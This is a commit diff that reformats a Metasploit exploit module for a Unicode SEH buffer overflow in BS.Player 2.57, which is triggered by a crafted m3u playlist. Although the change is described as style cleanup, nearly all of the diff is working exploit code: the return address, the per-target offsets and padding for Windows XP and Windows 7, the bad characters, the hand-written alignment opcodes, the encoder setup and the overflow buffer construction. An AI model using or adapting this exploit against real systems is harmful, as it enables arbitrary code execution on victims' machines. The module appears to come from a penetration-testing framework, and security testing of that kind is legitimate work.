Better MSF style compliance

modules/exploits/windows/fileformat/bsplayer_m3u.rb

@@ -1,7 +1,3 @@
-##
-# $Id: $
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -19,58 +15,68 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)',
-			'Description'	=> %q{
+			'Name'           => 'BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)',
+			'Description'    => %q{
 					This module exploits a buffer overflow in BS.Player 2.57. When
-					the playlist import is used to import a specially crafted m3u file,
-					a buffer overflow occurs allowing arbitrary code execution.
+				the playlist import is used to import a specially crafted m3u file,
+				a buffer overflow occurs allowing arbitrary code execution.
 			},
-			'License'		=> MSF_LICENSE,
-			'Author'		=>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
 					'C4SS!0 G0M3S ', # Original Exploit
 					'Chris Gabriel', # MSF Module
 					#Greets: Corelan team for mona.py & awesome tutorials
 				],
-			'References'	=>
+			'References'     =>
 				[
 					[ 'URL', 'http://www.exploit-db.com/exploits/15934/' ]
 				],
-			'DefaultOptions' =>
+			'DefaultOptions'  =>
 				{
 					'ExitFunction' => 'process',
 					#'InitialAutoRunScript' => 'migrate -f',
 				},
-			'Platform'	=> 'win',
-			'Payload'	=>
+			'Platform'       => 'win',
+			'Payload'        =>
 				{
-					'Space' => 2000,
-					'BadChars' => "\x00\x0a\x0d\x1a\x80",
-					'DisableNops' => true,
+					'Space'           => 2000,
+					'BadChars'        => "\x00\x0a\x0d\x1a\x80",
+					'DisableNops'     => true,
 					'StackAdjustment' => -3500,
 				},
 
-			'Targets'		=>
+			'Targets'        =>
 				[
 					[ 'Windows XP',
 						{
-							'Ret'   	=>	"\x2f\x49",
-							'Offset'	=>	4102
+							# pop ecx # pop ebp # ret 0c
+							# ASLR: False, Rebase: False, SafeSEH: False
+							# v2.5.7.1051 (bsplayer.exe)
+							'Ret'     => "\x2f\x49",
+							'Offset'  => 4102,
+							'Padding' => 1879
 						}
-					], # pop ecx # pop ebp # ret 0c | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READWRITE} [bsplayer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.5.7.1051 (bsplayer.exe)
-					
+					],
 					[ 'Windows 7',
 						{
-							'Ret'   	=>	"\x2f\x49",
-							'Offset'	=>	4102
+							# pop ecx # pop ebp # ret 0c
+							# ASLR: False, Rebase: False, SafeSEH: False
+							# v2.5.7.1051 (bsplayer.exe)
+							'Ret'     => "\x2f\x49",
+							'Offset'  => 4102,
+							'Padding' => 1931
 						}
-					], # pop ecx # pop ebp # ret 0c | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READWRITE} [bsplayer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.5.7.1051 (bsplayer.exe)
+					],
 				],
-			'Privileged'	=> false,
-			'DisclosureDate'	=> 'Jan 07 2010',
-			'DefaultTarget'	=> 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jan 07 2010',
+			'DefaultTarget'  => 0))
 
-		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),], self.class)
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
+			], self.class)
 
 	end
 
@@ -78,50 +84,44 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		nseh = "\x61\x42"
 
-		align   = "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX	
-		align  += "\x6d"                # PAD
-		align  += "\x58"                # POP EAX
-		align  += "\x6d"                # PAD
-		align  += "\x50"                # PUSH EAX
-		align  += "\x6d"                # PAD
-		align  += "\xc3"                # RET
-
-		if target == targets[0] then
-			padding = rand_text_alpha_lower(1879)
-		elsif target == targets[1] then
-			padding = rand_text_alpha_lower(1931)
-		end
+		align  = ''
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x58"	# POP EAX
+		align << "\x6d"	# PAD
+		align << "\x50"	# PUSH EAX
+		align << "\x6d"	# PAD
+		align << "\xc3"	# RET
 
 		enc = framework.encoders.create('x86/unicode_mixed')
-
 		register_to_align_to = "EAX"
-
 		enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })
-
 		unicodepayload = enc.encode(payload.encoded, nil, nil, platform)
-		
+
+		padding = rand_text_alpha_lower(target['Padding'])
+
 		buffer  = "http://"
 		buffer << rand_text_alpha_lower(target['Offset'])
 		buffer << nseh